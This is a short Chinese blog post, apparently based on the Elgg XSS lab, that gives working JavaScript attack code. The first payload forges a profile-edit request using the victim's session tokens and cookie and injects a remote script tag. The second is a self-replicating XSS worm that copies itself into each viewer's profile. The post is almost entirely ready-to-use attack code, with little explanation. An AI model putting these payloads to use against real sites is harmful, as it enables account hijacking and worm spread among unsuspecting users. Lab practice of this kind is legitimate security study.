简单的XSS攻击

最新推荐文章于 2024-04-30 14:12:13 发布
最新推荐文章于 2024-04-30 14:12:13 发布
阅读量2.7k 收藏
点赞数
分类专栏: 网络安全 文章标签: XSS elgg
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/u014000832/article/details/46661579
版权

首先寻找攻击入口:


然后在里面写入js代码,如果js代码太长不能满足格式长度要求的话那就直接导入js文件

攻击代码如下:

var Ajax=null;
// Construct the header information for the HTTP request
Ajax=new XMLHttpRequest();
Ajax.open("POST","http://www.xsslabelgg.com/action/profile/edit",true);
Ajax.setRequestHeader("Host","www.xsslabelgg.com");
Ajax.setRequestHeader("Keep-Alive","300");
Ajax.setRequestHeader("Connection","keep-alive");
Ajax.setRequestHeader("Cookie",document.cookie);
Ajax.setRequestHeader("Content-Type","application/x-www-form-urlencoded");
// Construct the content. The<span style="font-family: Arial, Helvetica, sans-serif;"> format of the content can be learned</span>
// from LiveHTTPHeaders.
var briefdescription="<script src='http://www.xsslabelgg.com/file/download/57' type='text/javascript'></script>";
var content="name="+elgg.session.user.username+"&description=fuckfuckfuckfuckfuckfuck&guid="+elgg.session.user.guid+"&__elgg_token="+elgg.security.token.__elgg_token+"&__elgg_ts="+elgg.security.token.__elgg_ts+"&briefdescription="+briefdescription+"&accesslevel[description]=2&accesslevel[briefdescription]=2"; 
// You need to fill in the details.
// Send the HTTP POST request.
Ajax.send(content);
当不使用js导入时,攻击代码如下: 

<script id="worm" type="text/javascript">
var strCode = document.getElementById("worm").innerHTML;
var sub_script_begin="worm<script id=worm>";
var sub_script_end="<\/script>";
var sub_script=sub_script_begin.concat(strCode,sub_script_end);
sub_script = escape(sub_script);
var Ajax=null;
// Construct the header information for the HTTP request
Ajax=new XMLHttpRequest();
Ajax.open("POST","http://www.xsslabelgg.com/action/profile/edit",true);
Ajax.setRequestHeader("Host","www.xsslabelgg.com");
Ajax.setRequestHeader("Keep-Alive","300");
Ajax.setRequestHeader("Connection","keep-alive");
Ajax.setRequestHeader("Cookie",document.cookie);
Ajax.setRequestHeader("Content-Type","application/x-www-form-urlencoded");
// Construct the content. The format of the content can be learned
// from LiveHTTPHeaders.
var content="name=".concat(elgg.session.user.username).concat("&description=").concat(sub_script).concat("&guid=").concat(elgg.session.user.guid).concat("&__elgg_token=").concat(elgg.security.token.__elgg_token).concat("&__elgg_ts=").concat(elgg.security.token.__elgg_ts).concat("&accesslevel[description]=2"); 
// You need to fill in the details.
// Send the HTTP POST request.
Ajax.send(content);
alert(content);
</script>
这是采用worm方式进行的攻击,当受害者浏览时可被感染。


love小树林
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
简学-XSS 攻击
码农米格的博客
03-10 138
XSS 攻击0x00 XSS 的相关概念0x00.1 XSS 的分类反射型 XSS:存储型 XSSDOM型XSS0x01 XSS 基本payloadXSS 常见攻击手段 针对 XSS 攻击的学习与笔记。推荐一个免费的练习靶场: 0x00 XSS 的相关概念 跨站脚本攻击(Cross Site Scripting),为不和层叠样式表(Cascading Style Sheets, CSS)的缩写混淆,故将跨站脚本攻击缩写为XSS。 恶意攻击者往Web页面里插入恶意Script代码,当用户浏览该页之时
XSS 攻击
白菜执笔人的博客
03-03 799
Web安全攻防 学习笔记 一、XSS 攻击 1.1、实验环境介绍         地址:https://xss-quiz.int21h.jp/ 1.2、探测 XSS 过程 构造一个不会被识别为恶意代码的字符串提交到页面中 使用浏览器审查工具进行代码审查,寻找构造的字符串是否在页面中显示 1.3、闭合文本标签利用 XSS   ...
XSS知识点和20字符短域名绕过
qq_56970600的博客
07-26 690
XSS知识点和20字符短域名绕过
XSS 攻击简述
Cream_Bule的博客
08-13 286
XSS攻击通常指的是通过利用网页开发时留下的漏洞,通过巧妙的方法注入恶意指令代码到网页,使用户加载并执行攻击者恶意制造的网页程序。这些恶意网页程序通常是JavaScript,但实际上也可以包括Java、 VBScript、ActiveX、 Flash 或者甚至是普通的HTML。 使用 Django 也可以简单模拟次效果 def xss(request): s = ''' <script> for (let i=0; i<10000000000; i++){
最全--跨站脚本攻击(XSS)举例和预防方法
最新发布
Keep trying, keep going
04-30 1351
跨站脚本攻击(XSS)是指攻击者通过,从而窃取用户信息、篡改网页内容等。。
常用xss代码以及绕过
csviking的博客
11-18 7714
常规xss代码 "OnMoUsEoVeR=prompt(1)// #一般用于表单框插入比较好 "-prompt(1)-" # URL删除参数,列如id=1 xss添加为id="-prompt(1)-"
XSS基础了解和解决方案
崔向阳@李晓的博客
07-16 1390
主要内容什么是XSSXSS的危害有哪些?常见的XSS漏洞如何防范XSS? 什么是XSS?跨站脚本攻击(Cross Site Scripting),是一种 Web 应用程序的漏洞,当来自用户的不可信数据被应用程序在没有验证以及反射回浏览器而没有进行编码或转义的情况下进行了处理,导致浏览器引擎执行了代码。 XSS的危害有哪些?盗取各类用户帐号,如机器登录帐号、用户网银帐号、各类管理员帐号控制企业数据...
XSS 攻击常用代码
高压锅博客
12-22 7208
代码XSS 攻击常用代码
防止XSS攻击解决办法
01-20
防止XSS攻击是保护Web应用安全的重要一环,对于任何Web开发者来说都是必备的知识。 一、XSS攻击类型 XSS攻击主要分为三类:反射型XSS、存储型XSS和DOM型XSS。 1. 反射型XSS:攻击者通过构造恶意链接,诱使用户点击...
XSS攻击实例1
01-11
在本实例"XSS攻击实例1"中,我们将探讨这种攻击的原理、类型以及如何在Asp.net框架下预防。 XSS攻击主要分为三类:反射型XSS、存储型XSS和DOM型XSS。反射型XSS是通过诱使用户点击含有恶意参数的链接,将脚本插入到...
XSS攻击 代码演示
05-13
网站xss 攻击 代码示例,包括alert弹框,钓鱼网站截取用户cookie信息等;是学习xss简单示例。可以下载玩玩看看,示例中的钓鱼网站地址为 演示地址,即本资源中的项目地址。xss也是很简单的,可以学习学习
XSS payload大全
01-22
总结的XSS的payload,可以直接使用,直接进行攻击,各种payload
简单模拟XSS攻击.zip
07-05
标题 "简单模拟XSS攻击.zip" 提到的主题是关于网络安全中的跨站脚本(XSS)攻击,这种攻击发生在Web应用程序中,攻击者通过注入恶意脚本,使用户在不知情的情况下执行。在这个示例中,它展示了如何利用前端用户输入...
PHP如何防止XSS攻击XSS攻击原理的讲解
01-02
XSS又称CSS,全称Cross SiteScript(跨站脚本攻击), XSS攻击类似于SQL注入攻击,是Web程序中常见的漏洞,XSS属于被动式且用于客户端的攻击方式,所以容易被忽略其危害性。其原理是攻击者向有XSS漏洞的网站中输入...
无需括号的xss payload
一个安全研究员
08-08 1611
现在就是非常后悔
实现 XSS 攻击简单示例
weixin_34128839的博客
06-21 1910
为什么80%的码农都做不了架构师?>>> ...
实现简单xss
tlucky的博客
04-12 1045
1.简介 XSS(跨站脚本攻击)又叫CSS (Cross Site Script) ,为了区别层叠样式表(CSS)所以叫XSS,XSS的重点不在于跨站点,而是在于脚本的执行。XSS是一种经常出现在 Web 应用程序中的计算机安全漏洞,是由于 Web 应用程序对用户的输入过滤不足而产生的,它指的是攻击者往Web页面里插入恶意html代码,当用户浏览该页之时,嵌入其中Web里面的html代码会被执行,从而达到恶意的特殊目的。 2.利用xss 一、窃取用户的cookie,登陆用户账号 二、进行社工钓鱼,如弹出来
XSS攻击简单实现
热门推荐
hxxjxw的博客
04-28 2万+
xss 跨站脚本攻击(Cross Site Script) ①在慕课网跟着教学视频自己编写一个网页 ,用这个网页模拟有XSS漏洞的网站。 在网页源码中插入了这样一句话。 这句话的作用其实是:显示一个搜索框。将搜索框中显示的内容是你用户输入之后的内容。 通过看网站源码,我们可以知道,他让用户在显示框输入一个内容,然后就把这个内容当做显示框内容显示。 ...
XSS攻击的一个校内简单实例
YKRY35的博客
11-11 1万+
前言 偷得浮生半日闲。 记一记往事。 大神请绕道。。 写之前打开hackinglab,一年不见,多了个创新关。 脚本关的12-15题是XSS。打开脚本关的XSS瞅了一眼,15关没过。 想起上次啃15关啃了很久啃不出,那时还在高中的图书馆里。此处省略一千字。 时隔若干年,老夫要找个时间再试一试。 这里的攻击对象是学校旧的网络...
反射性xss攻击实例
05-25
反射型XSS攻击是指攻击者将恶意脚本注入到URL中,当受害者点击带有...这就是一个简单的反射型XSS攻击的实例。攻击者可以通过构造不同的恶意脚本,来实现不同的攻击目的,如窃取用户的敏感信息、盗取用户的cookie等。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值